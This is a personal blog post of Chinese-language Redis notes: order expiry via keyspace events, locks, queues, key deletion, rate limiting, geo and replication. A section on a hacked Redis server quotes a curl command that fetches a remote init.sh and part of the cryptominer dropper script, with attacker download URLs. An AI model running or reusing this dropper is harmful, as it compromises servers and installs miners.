​​​​ redis 记录 | 苏生不惑的博客

redis 记录

指定时间自动取消订单

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
1) 使用Linux内置的crontab定时任务,每隔几秒甚至几分钟轮训遍历一次数据库,找到超出时间间隔的订单,进行取消。这种办法没有失效性以及在没有订单的时间内属于浪费服务器资源。

2) 使用框架内置的延时处理机制。比如Laravel的队列任务,可以指定多少分钟后执行。这样就能判断订单是否超出时间间隔,是否要取消订单恢复库存量。

3) 使用Redis的keyspace notification(键空间通知)。Redis可以设置一个key到多久时间后过期,比如:SETEX name 123 20,设置name在20秒后过期。此时,过期会触发事件发布,所有redis客户端都会订阅,获得相关信息。
//https://www.guaosi.com/2019/02/25/automatically-cancel-the-order/
vim usr/local/etc/redis/redis.conf
notify-keyspace-events "Ex"
service redis-server restart /usr/local/etc/redis/redis.conf
会监听0号库所有过期的key
redis-cli
psubscribe __keyevent@0__:expired 监听0号库所有过期的key
setex name 5 guaosi
5秒后,原终端会输出如下

1) "pmessage"
2) "__keyevent@0__:expired"
3) "__keyevent@0__:expired"
4) "name"
class MRedis
{

private $redis;

/**
* 构造函数
*
* @param string $host 主机号
* @param int $port 端口号
*/
public function __construct($host = 'redis', $port = 6379)
{
$this->redis = new redis();
$this->redis->connect($host, $port);
}

public function expire($key = null, $time = 0)
{
return $this->redis->expire($key, $time);
}
public function psubscribe($patterns = array(), $callback)
{
$this->redis->psubscribe($patterns, $callback);
}

public function setOption()
{
$this->redis->setOption(Redis::OPT_READ_TIMEOUT, -1);
}
}
//变量$msg就是过期的key的名称,我们只能获取到key的名称,不能获得到原来设置的值。
function callback($redis, $pattern, $chan, $msg)
{
// 回调函数,这里写处理逻辑
echo "Pattern: $pattern\n";
echo "Channel: $chan\n";
echo "Payload: $msg\n";
}

$redis = new MRedis();
//redis会有默认连接时间,对 redis客户端进行一些参数设置,使读取超时参数 为 -1,表示不超时。
$redis->setOption();
//这里输入订阅,以及订阅成功后触发的函数名
//监听库为0里的过期key
$redis->psubscribe(array('__keyevent@0__:expired'), 'callback');
php test.php

larvel config/database.php
'redis' => [
'client' => 'predis',
'default' => [
'host' => env('REDIS_HOST', '127.0.0.1'),
'password' => env('REDIS_PASSWORD', null),
'port' => env('REDIS_PORT', 6379),
'database' => env('REDIS_DATABASE', 0),
'persistent' => true, // 开启持久连接
'read_write_timeout' => 0,
//据Predis作者在配置文件中说明
//因为在底层网络资源上执行读取或写入操作时使用了超时,默认设置了timeout 为60s。
//到60s自动断开并报错.设置成0可以解决这个问题。
],

],
class OrderController extends Controller{
//创建用户订单
public function store(Request $request)
{
//这里是接收到用户传来的下单信息,存入数据库后,返回一个订单id
//我们让返回的订单ID为2019
$order_id = 2019;
//因为一个项目中可能会有很多使用到setex的地方,所以给订单id加个前缀
$order_prefix_id = 'order_'.$order_id;
//将订单ID存入redis缓存中,并且设置过期时间为5秒
$key_name = $order_prefix_id; //我们在订阅中只能接收到$key_name的值
$expire_second = 5; //设置过期时间,单位为秒
$value = $order_id;
Redis::setex($key_name,$expire_second,$value);
echo "设置过期key=".$order_prefix_id."成功";
}
}

public function handle()
{
//项目中有可能用的redis不是0,所以这里用env配置里面获取的
$publish_num=env('REDIS_DATABASE', 0);
Redis::psubscribe(['__keyevent@'.$publish_num.'__:expired'], function ($message, $channel) {
//$message 就是我们从获取到的过期key的名称
$explode_arr=explode('_',$message);
$prefix=$explode_arr[0];
if($prefix=='order'){
$order_id=$explode_arr[1];
echo $order_id;
//这里就是编写过期的订单,过期后要如何处理的业务逻辑
//TODO
}
});
}
监听处理程序只要一台处理,把监听处理的过程改一下,取出订单 ID 之后不要去处理,通过 rpush 放到一个 redis 的队列里去。另外起几台服务器,连到这个 redis 服务器,通过 blpop 接收消息队列里出来的订单 ID。这样,多台机器可以同时工作,一个订单只会从 blpop 里出来一次,不会重复执行,多台机器可以分担任务,又互不影响。消息队列也可以换成业界成熟的 rabbitmq 、 kafka 之类的专业消息队列,那又是另外一个话题了。反正业务量大了,变复杂了,消息总线跑不掉,天猫京东也差不多如此https://learnku.com/articles/21488

使用 zset 比利用 redis 的大 key set 这样的形式,节约一些空间占用,定时任务处理方面,可以使用 swoole 的 swoole_timer_tick 全都是内存级的操作,会提升很多效率。https://alpha2016.github.io/2019/02/24/%E5%80%9F%E5%8A%A9Swoole%E5%AE%9A%E6%97%B6%E8%BF%87%E6%9C%9F%E6%9C%AA%E6%94%AF%E4%BB%98%E8%AE%A2%E5%8D%95/
借助 redis 的 zset 有序集合,订单产生的时候,zadd orders timestamp orderid 将 orderid 保存到对应的 orders 集合中,以时间戳作为他的 score 分值,存储部分是这样的,简单 + 占用空间内存极小。读取部分: 在 swoole 启动时,设置定时器,每分钟去 orders set 中读取设置的时间之前的数据,个人为了测试方便,设置的读取前一分钟到前三十分钟内的数据。获取到数据之后,根据业务逻辑处理数据,然后 zrem orders orderid 命令从集合中移除对应的 orderid。个人以为这个方案是内存占用和效率兼具的一个方案

<?php
$server = new swoole_websocket_server("0.0.0.0", 9502);

// 在定时器中使用协程需要增加此项配置
$server->set(
[
'enable_coroutine' => true
]
);

$server->on('workerStart', function ($server, $workerId) {
$redis = new Swoole\Coroutine\Redis();
$redis->connect('127.0.0.1', 6379);

// tick 为持续触发的定时器
swoole_timer_tick(10000, function() use ($redis) {
$upperLimitTime = strtotime('-1 minute');
$lowerLimitTime = strtotime('-30 minute');
echo '上限时间:' . $upperLimitTime . '下限时间:' . $lowerLimitTime;
$result = $redis->zrangebyscore('orders', $lowerLimitTime, $upperLimitTime);
var_dump($result);

// 根据查询到的 id 进行业务处理,然后 zrem orders orderid 移除处理成功的 orderid
});
});

$server->on('message', function (swoole_websocket_server $server, $request) {
$server->push($request->fd, "hello");
});

$server->start();

数据类型不一致

1
2
3
两处使用了一个 zSets,一处是从网页获取数据,放到 zSets 里面;另一处是从数据库获取数据放到 zSets 里面。在后期做清除数据操作的时候,发现了数据清除的不完全,后来仔细的检查了一下。发现数据重复。
https://www.h57.pw/2016/09/20/redis-zsets-data-type-inconsistency/
仔细测试了好一会儿之后,才发现了问题坐在,就是当 score 相同的时候,相同的 value 会覆盖数据,这里的 value 相同,并不仅仅是值相同,而且数据类型也应该一致才会覆盖。否则就会产生 score 相同的两条数据。

Redis 被黑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
https://learnku.com/laravel/t/28411
MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
之后通过 127.0.0.1:6379> config set stop-writes-on-bgsave-error no 命令解决了问题
执行 curl -fsSL http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init.sh 等命令得了一些脚本
#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://pixeldrain.com/api/download/Y0o4foA1"
miner_url_backup="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/sysupdate"
miner_size="854364"
sh_url="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/update.sh"
sh_url_backup="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/update.sh"
config_url="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/config.json"
config_url_backup="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/config.json"
config_size="3300"
scan_url="https://pixeldrain.com/api/download/OMKMU5Td"
scan_url_backup="http://198.13.42.229:8667/6HqJB0SPQqbFbHJD/networkservice"
scan_size="2584064"

https://www.freebuf.com/vuls/148758.html 查看线上环境是否使用了 redis-weui 了

加锁和解锁问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
if ($redis->set('my:lock', 1, ['NX'])) {
# todo

$redis->del('my:lock');
}
其中NX — 表示只有key不存在的时候才设置https://shuwoom.com/?p=2833
if ($redis->set('my:lock', 1, ['NX', 'EX' => 10])) {
# todo

$redis->del('my:lock');
}

原子性问题而面临上面同样的问题。所以这里要用到lua脚本来解决。

$script = '
if redis.call("get",KEYS[1]) == ARGV[1]
then
return redis.call("del",KEYS[1])
else
return 0
end
';
$token = uniqid(mt_rand(), true);
if ($redis->set('my:lock', $token, ['NX', 'EX' => 10])) {
# todo

$redis->eval($script, ["my:lock", $token], 1);
} else {
echo 'get lock failed!';
}

php redis

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
try {
$redis = new Redis();
$redis->connect('127.0.0.1', 6379, 1); # 短连接,超过1秒放弃连接https://shuwoom.com/?p=2786
// $redis->open('127.0.0.1', 6379, 1); # 同上
// $redis->pconnect('127.0.0.1', 6379, 1); # 长连接,超过1秒放弃连接
$redis->popen('127.0.0.1', 6379, 1); # 同上

# 登录验证密码,返回:true或false
if ($redis->auth('password')) {
echo 'auth success!';
} else {
echo 'auth failed!';
throw new Exception('Redis auth failed!');
}

$redis->select(0); # 选择redis库,0~15,共16个库
$redis->close(); # 释放资源
// $redis->ping(); # 检查是否还在连接
} catch (Exception $e) {
var_dump($e->getMessage());
}

常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
ping ping我们的主机能否链接 链接是否存活
echo 命令 echo demo直接输出
select 选择数据库 select 0-16个数据库
quit exit 退出链接
dbsize 返回数据库的键的个数
info 返回服务器相关信息
config get 返回服务配置信息
flush db 清空数据库
flushall 删除所有数据库中所有的键
Key-values
keys * 匹配键所有的键. 模糊匹配 keys my* 取出所有已my开头的键
exists 判断是否键 exists name判断是否有name这个键是否存在
del 删除键 del name 删除name的键
expire 设置过期时间 expire key time
ttl key 查看键的过期时间
select database 选择数据库
move key dababase1 讲key移动dao database1中的数据库中
persist 取消键的过期时间
randomkey 随机返回一个键的值
rename 重命名一个键
type key 判断key的数据类型
批量删除 0号数据库中名称含有OMP_OFFLINE的key:

src/redis-cli -n 0 keys "*OMP_OFFLINE*"|xargs src/redis-cli -n 0 del
在redis的客户端环境中并不支持批量删除。

可以把某个keys的结果全部输出到文件中,比如keys.log

redis-cli -p port -c command > keys.log
https://anttutu.github.io/2017/06/redis/

批量删除redis的key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
redis-cli -h host -p 6379 -a pwd -n 15 --scan --pattern 'exchange*' | xargs -0 -n 5000 redis-cli -h host -a pwd -p 6379 -n 15 DEL
-h 你的redis服务器地址
-p 端口 默认6379
-a 密码
-n 选择redis对应的db

xargs参数:
-n 按每n个为一组输出参数,如果redis的Key数量大的话可以增加此参数,否则会报错 argument list too long
-0 当key还有引号等特殊字符,加此参数可以屏蔽,使特殊字符失效,不加会报错:
https://segmentfault.com/a/1190000016717860
每次扫10条 redis-cli --scan --pattern 'app:uid:reg:date:707*'|xargs -n 10 redis-cli mget

登录redis通过info查看,内存使用25G多,而KEY也有1.44亿了。。。REIDS中有大量无用而又未设置过期时间的KEY存在。设置个过期时间,举手之劳的事,还是有必要的。

used_memory_human:24.72G
db0:keys=144856453,expires=25357
通过测试机执行 keys prefix* 导致REDIS卡死,其他连接也连不上。所以定位到问题出现在keys命令上,也正如手册上说的造成性能问题。

如何删除未用到的KEY?

大部分KEY是有规律的,有特定前缀,需要拿到特定前缀的KEY然后删除,网上有这样的命令:

redis-cli -a redis-pwd -n 0 keys "preffix*" | xargs redis-cli -p 6379 -a redis-pwd -n 0 del
测试机执行keys “preffix-1*“时间大概40多s,这意味着redis要停40s+,而前缀是按天设置的,这样子需要操作多次,因为业务的原因,不允许这么操作,分分钟都是钱~最后想到的办法是先从测试机上把满足条件的key导到文本,前面的语句通过cat文本去拿。如:

redis-cli -p 6380 -a redis-pwd keys "preffix-1*" > /home/keys_redis/preffix-1
然后通过这些数据删掉生产环境上的key。

cat /home/keys_redis/preffix-1 | xargs redis-cli -a redis-pwd -n 0 del
删除的速度非常快,内存耗的也挺快,感觉像是有多少耗多少的。执行之后KEY的数量减少了95%+,内存也从25G降到了2G。不过有一个指数升高:mem_fragmentation_ratio,前后的memory对比:

# Memory 处理前
used_memory:26839186032
used_memory_human:25.00G
used_memory_rss:23518339072
used_memory_peak:26963439000
used_memory_peak_human:25.11G
used_memory_lua:31744
mem_fragmentation_ratio:0.88
mem_allocator:jemalloc-3.2.0

# Memory 处理后
used_memory:2399386704
used_memory_human:2.23G
used_memory_rss:4621533184
used_memory_peak:26963439000
used_memory_peak_human:25.11G
used_memory_lua:31744
mem_fragmentation_ratio:1.93
mem_allocator:jemalloc-3.2.0

https://itopic.org/redis-delete-keys.html

<?php

$redis = new Redis();
//设置扩展在一次scan没有查找出记录时 进行重复的scan 直到查询出结果或者遍历结束为止
$redis->setOption(Redis::OPT_SCAN, Redis::SCAN_RETRY);

$match = 'foo:*';
$count = 10000;
$it=null;

//这种用法下我们只需要简单判断返回结果是否为空即可, 如果为空说明遍历结束
while ($keys = $redis->scan($it, $match, $count)) {
$redis->del($keys);
}

?>
在删除的同时注意监控内存变化情况,就能确认问题了:

shell> watch -d -n 1 '/path/to/redis-cli info | grep memory'

/* 设置遍历的特性为不重复查找,该情况下扩展只会scan一次,所以可能会返回空集合 */
$redis->setOption(Redis::OPT_SCAN, Redis::SCAN_NORETRY);

$it = NULL;
$pattern = '*';
$count = 50; // 每次遍历50条,注意是遍历50条,遍历出来的50条key还要去匹配你的模式,所以并不等于就能够取出50条key

do
{
$keysArr = $redis->scan($it, $pattern, $count);

if ($keysArr)
{
foreach ($keysArr as $key)
{
echo $key . "\n";
}
}

} while ($it > 0); //每次调用 Scan会自动改变 $it 值,当$it = 0时 这次遍历结束 退出循环




https://blog.csdn.net/zhang197093/article/details/74615717
https://blog.huoding.com/2014/04/11/343

有序集合实现 24 小时排行榜实时更新

1
2
3
4
5
6
7
8
9
利用 ZADD 按小时划分添加用户的积分信息,然后用 ZUNIONSTORE 并集实现 24 小时的游戏积分总和,实现 “24 小时排行榜”;

ZUNIONSTORE destination numkeys key [key ...]
Redis Zunionstore 命令计算给定的一个或多个有序集的并集,其中给定 key 的数量必须以 numkeys 参数指定,并 将该并集(结果集)储存到 destination 。
默认情况下,结果集中某个成员的分数值是所有给定集下该成员分数值之和 。

Redis 在遇到分数相同时是按照集合成员自身的字典顺序来排序,这里即是按照”user2″和”user3″这两个字符串进行排序,以逆序排序的话 user3 自然排到了前面。要解决这个问题,我们可以考虑在分数中加入时间戳,计算公式为:
带时间戳的分数 = 实际分数*10000000000 + (9999999999 – timestamp)
https://learnku.com/articles/30279

主从配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
cp /usr/local/redis/redis.conf /usr/local/redis/redis.6380.conf

[root@localhost redis]# vim /etc/redis/redis.conf
bind 0.0.0.0 # 绑定允许访问的ip地址,如本机模拟主从可不改变值仍使用127.0.0.1

[root@localhost redis]# vim /usr/local/redis/redis.6380.conf
port 6380 # 将端口更改为6380
slaveof 127.0.0.1 6379 # 指定master ip port

[root@localhost redis]# redis-server /usr/local/redis/redis.conf # 启动master
[root@localhost redis]# redis-server /usr/local/redis/redis.6380.conf # 启动slave
查看 Master 状态

[liubo@localhost ~]$ redis-cli -p 6379
127.0.0.1:6379> info
# Server
……
# Clients
……
# Memory
……
# Persistence
……
# Stats
……
# Replication # 关注此区域
role:master # 当前角色,master
connected_slaves:1 # 已连接slave:1个
slave0:ip=127.0.0.1,port=6380,state=online,offset=56,lag=1 # slave0信息
master_replid:7e3b0e1accd31abaf58177160685d51952ea1e90
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:56
second_repl_offset:-1
repl_backlog_active:1
repl_backlog_size:1048576
repl_backlog_first_byte_offset:1
repl_backlog_histlen:56
# CPU
……
# Cluster
……
查看 Slave 状态

[liubo@localhost ~]$ redis-cli -p 6380
127.0.0.1:6379> info
# Server
……
# Clients
……
# Memory
……
# Persistence
……
# Stats
……
# Replication # 关注此区域
role:slave # 当前角色,slave
master_host:127.0.0.1 # master相关信息
master_port:6379
master_link_status:up # 连接master状态
master_last_io_seconds_ago:4
master_sync_in_progress:0
slave_repl_offset:84
slave_priority:100
slave_read_only:1
connected_slaves:0
master_replid:7e3b0e1accd31abaf58177160685d51952ea1e90
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:84
second_repl_offset:-1
repl_backlog_active:1
repl_backlog_size:1048576
repl_backlog_first_byte_offset:1
repl_backlog_histlen:84
# CPU

https://learnku.com/index.php/articles/30765

分布式锁

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$redis = new Redis();
$redis->connect('127.0.0.1', 6379);
$ok = $redis->setNX($key, $value);
if ($ok) {
//获取到锁
... do something ...
$redis->del($key);
}

$redis->multi();
$redis->setNX($key, $value);
$redis->expire($key, $ttl);
$res = $redis->exec();
if($res[0]) {
//获取到锁
... do something ...
$redis->del($key);
}
$script = <<<EOT
local key = KEYS[1]
local value = KEYS[2]
local ttl = KEYS[3]

local ok = redis.call('setnx', key, value)

if ok == 1 then
redis.call('expire', key, ttl)
end
return ok
EOT;

$res = $redis->eval($script, [$key,$val, $ttl], 3);
if($res) {
//获取到锁https://learnku.com/articles/30827
... do something ...
$redis->del($key);
}

$ok = $redis->set($key, $random, array('nx', 'ex' => $ttl));

if ($ok) {
//获取到锁
... do something ...
if ($redis->get($key) == $random) {
$redis->del($key);
}
}


引入了一个随机数,这是为了防止逻辑处理时间过长导致锁的过期时间已经失效,这时候下一个请求就获得了锁,但是前一个请求在逻辑处理完直接删除了锁。

锁主要用在并发请求如秒杀等场景中,以上便是 redis 锁的实现。

异步消息队列与延时队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
$redis = new Redis();
$redis->connect('127.0.0.1', 6379);

//发送消息
$redis->lPush($list, $value);

//消费消息
while (true) {
try {
$msg = $redis->rPop($list);
if (!$msg) {
sleep(1);
}
//业务处理

} catch (Exception $e) {
echo $e->getMessage();
}
}

blpop/brpop在队列没有数据的时候,会立即进入休眠状态,一旦数据到来,则立刻醒过来。消息的延迟几乎为零。用blpop/brpop替代前面的lpop/rpop,就完美解决了上面的问题。
将有序集合的value设置为我们的消息任务,把value的score设置为消息的到期时间,然后轮询获取有序集合的中的到期消息进行处理。
实现代码如下:
$redis = new Redis();
$redis->connect('127.0.0.1', 6379);

$redis->zAdd($delayQueue,$tts, $value);

while(true) {
try{
$msg = $redis->zRangeByScore($delayQueue,0,time(),0,1);
if(!$msg){
continue;
}
//删除消息
$ok = $redis.zrem($delayQueue,$msg);
if($ok){
//业务处理
}
} catch(\Exception $e) {

}
}
https://learnku.com/articles/30826
HyperLogLog 算法是一种非常巧妙的近似统计海量去重元素数量的算法。它内部维护了 16384 个桶(bucket)来记录各自桶的元素数量。当一个元素到来时,它会散列到其中一个桶,以一定的概率影响这个桶的计数值。因为是概率算法,所以单个桶的计数值并不准确,但是将所有的桶计数值进行调合均值累加起来,结果就会非常接近真实的计数值。

pfadd 增加计数
pfcount 获取计数
HyperLogLog 还提供了第三个指令 pfmerge,用于将多个 pf 计数值累加在一起形成一个新的 pf 值。

比如在网站中我们有两个内容差不多的页面,运营需要将两个页面的数据进行合并。其中页面的 UV 访问量也需要合并,这时候就可以使用 pfmerge
布隆过滤器可以理解为一个不怎么精确的 set 结构
> docker pull redislabs/rebloom # 拉取镜像
> docker run -p 6379:6379 redislabs/rebloom # 运行容器
> redis-cli # 连接容器中的 redis 服务
bf.add 添加元素
bf.exists 查询元素是否存在
bf.madd 一次添加多个元素
bf.mexists 一次查询多个元素是否存在

主要是解决大规模数据下不需要精确过滤的场景,如检查垃圾邮件地址,爬虫 URL 地址去重,解决缓存穿透问题等。

geo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
添加杭州北京上海的地理位置
127.0.0.1:6379> geoadd city 120.20000 30.26667 hangzhou 116.41667 39.91667 beijing 121.47 31.23 shanghai
geopos 指令可以获取集合中任意元素的经纬度坐标,可以一次获取多个。

127.0.0.1:6379> geopos city hangzhou beijing shanghai
1) 1) "120.15000075101852417"
2) "30.2800007575645509"
2) 1) "116.39999896287918091"
2) "39.90000009167092543"
3) 1) "121.47000163793563843"
2) "31.22999903975783553"
127.0.0.1:6379> geopos city hangzhou
1) 1) "120.15000075101852417"
2) "30.2800007575645509"
计算距离

距离单位可以是 m、km、ml、ft,分别代表米、千米、英里和尺。

127.0.0.1:6379> geodist city shanghai hangzhou km
"164.5694"
127.0.0.1:6379> geodist city beijing hangzhou km
"1122.7998"

例如查找距离杭州300km以内的城市的10个城市按距离排序

127.0.0.1:6379> GEORADIUSBYMEMBER city hangzhou 300 km WITHCOORD WITHDIST WITHHASH ASC COUNT 10
1) 1) "hangzhou"
2) "0.0000"
3) (integer) 4054134257390783
4) 1) "120.15000075101852417"
2) "30.2800007575645509"
2) 1) "shanghai"
2) "164.5694"
3) (integer) 4054803462927619
4) 1) "121.47000163793563843"
2) "31.22999903975783553"
在给定以下可选项时, 命令会返回额外的信息:

WITHDIST : 在返回位置元素的同时, 将位置元素与中心之间的距离也一并返回。 距离的单位和用户给定的范围单位保持一致。
WITHCOORD : 将位置元素的经度和维度也一并返回。
WITHHASH : 以 52 位有符号整数的形式, 返回位置元素经过原始 geohash 编码的有序集合分值。
ASC : 根据中心的位置, 按照从近到远的方式返回位置元素。DESC : 根据中心的位置, 按照从远到近的方式返回位置元素。
获取元素的 hash 值

可能你还注意到有一个命令 GEOHASH, 那他是做什么的呢

127.0.0.1:6379> geohash city hangzhou
1) "wtmkq069cc0"
127.0.0.1:6379> geohash city beijing
1) "wx4fbxxfke0"
返回的其实是元素的经纬度经过 goehash 计算后的 base32 编码字符串

http://geohash.org/wtmkq069cc0 进行直接定位
其存储结构主要使用的是 Redis 的有序结构,其 score 是 GeoHash 的 52 位整数值

127.0.0.1:6379> ZRANGE city 0 -1 WITHSCORES
1) "hangzhou"
2) "4054134257390783"
3) "shanghai"
4) "4054803462927619"
5) "beijing"
6) "4069885360207904"

限流

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
在高并发场景下有三把利器保护系统:缓存、降级、和限流。缓存的目的是提升系统的访问你速度和增大系统能处理的容量;降级是当服务出问题或影响到核心流程的性能则需要暂时屏蔽掉。而有些场景则需要限制并发请求量,如秒杀、抢购、发帖、评论、恶意爬虫等。

限流算法
常见的限流算法有:计数器,漏桶、令牌桶。
function isActionAllowed($userId, $action, $period, $maxCount)
{
$redis = new Redis();
$redis->connect('127.0.0.1', 6379);
$key = sprintf('hist:%s:%s', $userId, $action);
$now = msectime(); # 毫秒时间戳

$pipe=$redis->multi(Redis::PIPELINE); //使用管道提升性能
$pipe->zadd($key, $now, $now); //value 和 score 都使用毫秒时间戳
$pipe->zremrangebyscore($key, 0, $now - $period); //移除时间窗口之前的行为记录,剩下的都是时间窗口内的
$pipe->zcard($key); //获取窗口内的行为数量
$pipe->expire($key, $period + 1); //多加一秒过期时间
$replies = $pipe->exec();
return $replies[2] <= $maxCount;
}
for ($i=0; $i<20; $i++){
var_dump(isActionAllowed("110", "reply", 60*1000, 5)); //执行可以发现只有前5次是通过的
}

//返回当前的毫秒时间戳
function msectime() {
list($msec, $sec) = explode(' ', microtime());
$msectime = (float)sprintf('%.0f', (floatval($msec) + floatval($sec)) * 1000);
return $msectime;
}

redis 删除大key集合的方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import redis

def test():
# StrictRedis创建连接时,这个连接由连接池管理,所以我们无需关注连接是否需要主动释放http://www.ikeguang.com/2019/03/14/redis-del-security/
re = redis.StrictRedis(host = "0.0.0.0",port = 6379,password = "123")
key = "test"
for i in range(100000):
re.sadd(key, i)

cursor = '0'
cou = 200
while cursor != 0:
cursor,data = re.sscan(name = key, cursor = cursor, count = cou)
for item in data:
re.srem(key, item)
print cursor

删除redis中过时的key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/python
# -*- coding:utf-8 -*-

# 需要手动删除redis中某一天产生的key

import sys
import commands

# 执行 shell 命令
def execCmd(cmd):
print cmd
return commands.getstatusoutput(cmd)

if __name__ == '__main__':
args = sys.argv
if len(args) != 4:
print 'please input correct cmd argument, like python /home/hadoop/scripts/rediskey.py 2018-08-01 port passwd'
sys.exit(1)
date = args[1]
port = args[2]
passwd = args[3]
keyPath = '/home/hadoop/scripts/rediskey.txt'
cmd = '/app/local/redis-3.2.11/src/redis-cli -h 0.0.0.0 -p %s -a %s keys *%s* > %s'%(port, passwd, date, keyPath)
(status,result) = execCmd(cmd)
if status == 0:
with open(keyPath) as f:
line = f.readline()
while line:
key = line.strip()
cmd = '/app/local/redis-3.2.11/src/redis-cli -h 0.0.0.0 -p %s -a %s del %s'%(port, passwd, key)
(status,result) = execCmd(cmd)
if status == 0:
print 'del key %s success'%(key)
else:
print 'del key %s failed...'%(key)
print result
line = f.readline()
else:
print result
print 'redis %s key delete finished...'%(date)
调用这个脚本,只需要输入命令:python /home/hadoop/scripts/rediskey.py '2018-08-01' 6379 '123456'
四个参数:

脚本名:/home/hadoop/scripts/rediskey.py
要清理的日期:2018-08-01
端口:6379
host:123456
基本思想就是模糊匹配redis的key,保存到一个文件,然后读取文件每一行,删除key即可。http://www.ikeguang.com/2018/08/28/delete-redis-key/

redis总结

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
redis中的键的生存时间
expire 设置生存时间(单位/秒)
expire key seconds(秒)

ttl 查看键的剩余生存时间
ttl key

persist 取消生存时间
persist key

expireat指定时刻过期
expireat key unix时间戳
expireat key 1551858600
一组redis命令要么都执行,要么都不执行。
原理:先将属于一个事务的命令发送给redis进行缓存,最后再让redis依次执行这些命令。

应用场景:
一组命令必须同时都执行,或者都不执行。
我们想要保证一组命令在执行的过程之中不被其它命令插入。
multi //事务开始
.....
exec //事务结束,开始执行事务中的命令
discard //放弃事务
正因为redis不支持回滚功能,才使得redis在事务上可以保持简洁和快速。
redis持久化指把数据持久化到磁盘,便于故障恢复,redis支持两种方式的持久化,可以单独使用或者结合起来使用。

第一种:RDB方式(redis默认的持久化方式)
第二种:AOF方式
edis持久化之RDB

rdb方式的持久化是通过快照完成的,当符合一定条件时redis会自动将内存中的所有数据执行快照操作并存储到硬盘上。默认存储在dump.rdb文件中。(文件名在配置文件中dbfilename)

redis进行快照的时机(在配置文件redis.conf中)

http://www.ikeguang.com/2018/12/12/redis-usage/
save 900 1 //表示900秒内至少一个键被更改则进行快照。
save 300 10 //表示300秒内10条被更改则快照
save 60 10000 //60秒内10000条
Redis自动实现快照的过程

1、redis使用fork函数复制一份当前进程的副本(子进程)
2、父进程继续接收并处理客户端发来的命令,而子进程开始将内存中的数据写入硬盘中的临时文件
3、当子进程写入完所有数据后会用该临时文件替换旧的RDB文件,至此,一次快照操作完成。
注意:快照时,要保证内存还有一半空间。
rdb的优缺点

优点:由于存储的有数据快照文件,恢复数据很方便。
缺点:会丢失最后一次快照以后更改的所有数据。

